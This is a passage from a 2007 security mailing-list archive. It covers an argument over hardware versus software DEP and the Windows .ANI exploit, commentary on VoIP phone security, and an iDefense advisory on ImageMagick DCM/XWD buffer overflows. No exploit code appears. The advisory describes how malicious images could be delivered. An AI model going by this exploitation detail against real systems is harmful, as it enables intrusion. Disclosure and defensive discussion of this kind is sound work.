<0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local> Message-ID: <432498141.20070402170639@Zoller.lu> Dear Larry, You are a stubborn guy are you? _Again_, I am not talking Software DEP but Hardware-enforced DEP. Read: 2 different things. This is my last email within this regard, I see no point in trying to give you further information that might help you estimate risk, as you seem resistant to help or pointers beyond your comprehension or current believe. You reference the correct page but then completely miss the point, please read the page entirely. Your pasted information related to software DEP not Hardware enforced DEP (which is NX bit) Quote (wiki) : If the x86 processor supports this feature in hardware, then the NX features are turned on automatically in Windows XP/Server 2003 by default. If the feature is not supported by the x86 processor, then no protection is given. "Software DEP" is unrelated to the NX bit, and is what Microsoft calls their enforcement of Safe Structured Exception Handling. Software DEP/SafeSEH simply checks when an exception is thrown to make sure that the exception is registered in a function table for the application, and requires the program to be built with it. This is likely a countermeasure to handle an exploit possible because of the way DEP handles NX faults; while most other technologies simply terminate the program unquestioningly, DEP raises an exception. It is not possible for a program to truly recover from an attack because program flow is destroyed in an unrecoverable manner. On the very same MS you reference page : Hardware-enforced DEP Hardware-enforced DEP marks all memory locations in a process as non-executable unless the location explicitly contains executable code. A class of attacks exists that tries to insert and run code from non-executable memory locations. DEP helps prevent these attacks by intercepting them and raising an exception. Hardware-enforced DEP relies on processor hardware to mark memory with an attribute that indicates that code should not be executed from that memory. DEP functions on a per-virtual memory page basis, and DEP typically changes a bit in the page table entry (PTE) to mark the memory page. Processor architecture determines how DEP is implemented in hardware and how DEP marks the virtual memory page. However, processors that support hardware-enforced DEP can raise an exception when code is executed from a page that is marked with the appropriate attribute set. Advanced Micro Devices (AMD) and Intel have defined and shipped Windows-compatible architectures that are compatible with DEP. Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the following: ? The no-execute page-protection (NX) processor feature as defined by AMD. ? The Execute Disable Bit (XD) feature as defined byIntel. List of CPUS with NX bit (curtosy of Wikipedia) * AMD Athlon 64 * AMD Athlon 64 X2 * AMD Athlon 64 FX * AMD Opteron * AMD Sempron (ab Paris) * AMD Turion 64 * AMD Turion 64 X2 * Intel Celeron D * Intel Celeron M (ab Dothan-Kern) * Intel Core Duo * Intel Core Solo * Intel Core 2 Duo * Intel Core 2 Extreme * Intel Pentium 4 (ab Prescott F/J-Typ) * Intel Pentium D * Intel Pentium Extreme Edition * Intel Pentium M (ab Dothan, neuere Modelle) * Transmeta Efficeon * VIA C7 That said, Michal Majchrowicz pointed out return-to-libc style still works with DEP enabled, yes, but what about ASLR activated in Vista? Anyways, George already tested it, can somebody else confirm whether this is an issue or non-issue on Vista with NX capable CPUs? -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From Thierry at Zoller.lu Mon Apr 2 16:44:46 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Mon, 2 Apr 2007 17:44:46 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <3d3168e50704020813j4b19cbdds75851b90ce9ed0c3@mail.gmail.com> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local> <432498141.20070402170639@Zoller.lu> <3d3168e50704020813j4b19cbdds75851b90ce9ed0c3@mail.gmail.com> Message-ID: <1310364043.20070402174446@Zoller.lu> Dear Michal, MM> You claim is just pointless. You CAN write MM> reliable exploit for Harware NX DEP and youCAN take over whole system MM> even in the IE Protected mode!!!! Oh dear, my "claim is just pointless", the fact is, I have not made such a claim, I have introduced the notion of Hardware DEP and Software DEP, that's what I did and that's all. Some poeple don't realise there is a difference between them I wanted to show them there is. In otherwords, claiming it works with "DEP enabled" just because the PoC worked on your software-DEP-enabled machine doesn't proof it works on HW-enabled-machines, that was my point. That's my entire point, not saying it can't be or is be done with Hardware DEP...get it ? I never claimed it can't be done, actually within our company some do, so.. Try the current milworm PoCs on NX enforced CPUS -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From shawnmer at gmail.com Mon Apr 2 16:42:18 2007 From: shawnmer at gmail.com (Shawn Merdinger) Date: Mon, 2 Apr 2007 09:42:18 -0600 Subject: [Full-disclosure] Cisco IP Phone vulnerability In-Reply-To: <20070401030540.GA54469@infiltrated.net> References: <20070401030540.GA54469@infiltrated.net> Message-ID: On 3/31/07, J. Oquendo wrote: > -----BEGIN LSD SIGNED MESSAGE----- > > Infiltrated.net Security Advisory: > Cisco IP Phone Denial of Service > http://www.infiltrated.net/ciscoIPPhone7960.html > Revision 6.9 Hi, If I may suggest, there could be other "root causes" here. This report below is quite a read, both content and length, and is most certainly no joke. Though (in the waning spirit of April fool's day) I suppose a little fun can be had...for instance, the rationale for why maddox.xmission.com is not an acceptable home page for emergency relief worker laptops still eludes me. After all, it's "The Best Page in the Universe" is it not? Or, perhaps you've pondered what is the most "politically correct" manner for expeditiously dispatching crystal meth addicts coming down from their high in scenic Pearlington, Mississippi after hurricane Katrina? Read on intrepid souls... http://www.nps.navy.mil/DisasterRelief/docs/NPS-Katrina_AAR_LL.pdf HASTILY FORMED NETWORKS FOR COMPLEX HUMANITARIAN DISASTERS AFTER ACTION REPORT AND LESSONS LEARNED FROM THE NAVAL POSTGRADUATE SCHOOL'S RESPONSE TO HURRICANE KATRINA 1 - 30 September 2005 Authors Brian Steckler (NPS Faculty) Bryan L. Bradford, Maj, USAF (NPS Student) Steve Urrea, Capt, USMC (NPS Student) Typical Question: "Should we worry about VoIP phone security posture and resistance to real-world attack?" Typical Answer: "VLANs. VoIP phones way inside the perimeter and untouchable. Nothing to see here. Move along. Last call. Thanks for stopping by." Perhaps not... Unfortunately, somehow essential security concepts, for example, "attackers will target your weakest points" and "attacker physical access can very well equal game over" seem largely absent from the dialog when it comes to the security posture of many VoIP phones (wifi, desktop, dual-mode). The evident issues thus far, from basic stability to ?ber-l4m3 low-hanging fruit, are the proverbial canaries in the coal mine; a love-tap compared to the beating looming on the horizon unless lots more folks with skin in this game get "eyes on target" to past, present and emerging risks/threats/vectors/mitigation/security QA, etc. Clearly the gloves are coming off, and it's not a stretch to imagine something, oh say, as obscure as the forthcoming Apple iPhone (or several) up for "PWN to OWN" right next to the Mac laptops (and who knows what else) at some security conference soon, perhaps this summer in that quaint and charming little desert town? Hrm, if Apple wanted to "reach out to the security community" I suppose DR might consider penciling in some time at Cansecwest for a iPhone lovefest [1]. After all, didn't Window Snyder recently mention something about who in the game these days seems to 0wn the little things that mean so much, like "power" and "control" and "time" [2] -- maybe the "lumps now better than lumps later" approach is a feasible tactic and makes good business sense? Eh, what do I know? Were I really smart I would've learned how to play golf and gone into marketing. Nevertheless, as with any gear, be it a hillbilly-armor Humvee or VxWorks Mars Lander, time will tell if VoIP phones, and recent/upcoming emergency communication offerings are up to the challenge and can truly "cut the fog" of chaos when the sh*t hits the fan. I really hope that when the rubber tires on all those fancy Jack Bauer wannabe suburbans [3] hit the road and get to where they need to go, that the packets also hit the wire the way they should, and the right people get the right information at the right time so they can make the right decisions...you know, like it happens on 24. So as we chuckle away yet another April Fool's Day, with many of us sitting in comfy homes with full bellies, waiting for our $700 Playstation 3 to catch fire and burn the house down (just wait until they start getting dusty - "dude, is that smoke?"), I humbly suggest that we try to understand the true costs and implications of security/quality issues affecting VoIP phones, and of course all the other pieces of this shifting, opaque puzzle of madness and amusement. Requisite bottom line: VoIP phones have emerged as a critical tool that's going into people's hands in demanding situations when communication matters most and circumstances are the least forgiving. There must be clear, tangible, and enforceable obligations in conjunction with truly independent and on-going security evaluation to ensure mission-critical VoIP phones are resistant to real-world attacks. Failure to take decisive action may very well end up costing more in human misery and property loss than the proactive investment to ensure reasonably secure posture in VoIP phones. Btw, thanks for sharing the new VoIP security tools at your site , and we'll get them added asap to the VOIPSA VoIP Security Tool List :-) Kind regards, --scm Shawn Merdinger Independent Security Researcher voipninja.com Notes: [1] Voipninja.com is accepting sponsorship of Voipninja research staff to attend select conferences ? potential ROI/deliverables include trip report, out-brief, and respectable bar tabs [2] http://news.zdnet.com/2100-1009_22-6170219.html [3] http://cms.firehouse.com/content/article/article.jsp?sectionId=46&id=54007 From labs-no-reply at idefense.com Mon Apr 2 16:52:29 2007 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 02 Apr 2007 11:52:29 -0400 Subject: [Full-disclosure] iDefense Security Advisory 03.31.07: Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities Message-ID: <461126BD.3020302@idefense.com> Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities iDefense Security Advisory 03.31.07 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 31, 2007 I. BACKGROUND ImageMagick is used as a suite of image manipulation tools (animate, composite, conjure, convert, display, identify, import, mogrify, and montage) which are sometimes used by other applications for processing image files. For more information about ImageMagick visit the following URL. http://www.imagemagick.org/ II. DESCRIPTION Remote exploitation of several buffer overflow vulnerabilities in ImageMagick, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code with the credentials used for image processing. An integer overflow exists ImageMagick's handling of DCM (Digital Imaging and Communications in Medicine) format files which allows an attacker to cause a heap-based buffer overflow. This vulnerability specifically exists in the ReadDCMImage() function. Two integer overflows exists ImageMagick's handling of XWD (X Windows Dump) format files that allows an attacker to cause a heap-based buffer overflow. The vulnerabilities specifically exist in the ReadXWDImage() function. An integer overflow could occur when calculating the amount of memory to allocate for the 'colors' or 'comment' field. III. ANALYSIS Exploitation of these vulnerabilities allows attackers to execute arbitrary code in the context of the user that started the affected program. Since the tools that are part of ImageMagick are sometimes used as helper tools by web applications, this user may be the same as the httpd user. To exploit these vulnerabilities, an attacker would need to get a maliciously constructed image file processed by one of the affected applications. This could be accomplished by uploading to a web-application or using social engineering tactics. While neither aforementioned format is widely used, ImageMagick does not determine the file type by its extension, allowing it to be disguised as another file type. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in ImageMagick version 6.3.x. Additionally, the source code for versions 6.3.1, 6.3.2, 6.3.3-3 and 6.2.9 contain the affected code. It is suspected that earlier versions of ImageMagick are also vulnerable. V. WORKAROUND Exposure to these vulnerabilities can be mitigated by moving or deleting the DCM and XWD module files from the ImageMagick modules directory. However, this will remove support for these image formats altogether. VI. VENDOR RESPONSE The ImageMagick maintainers have addressed these vulnerabilities in version 6.3.3-5 of ImageMagick. VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 02/28/2007 Initial vendor notification 03/20/2007 Initial vendor response 03/31/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From dave at immunityinc.com Sun Apr 1 20:42:17 2007 From: dave at immunityinc.com (Dave Aitel) Date: Sun, 01 Apr 2007 15:42:17 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local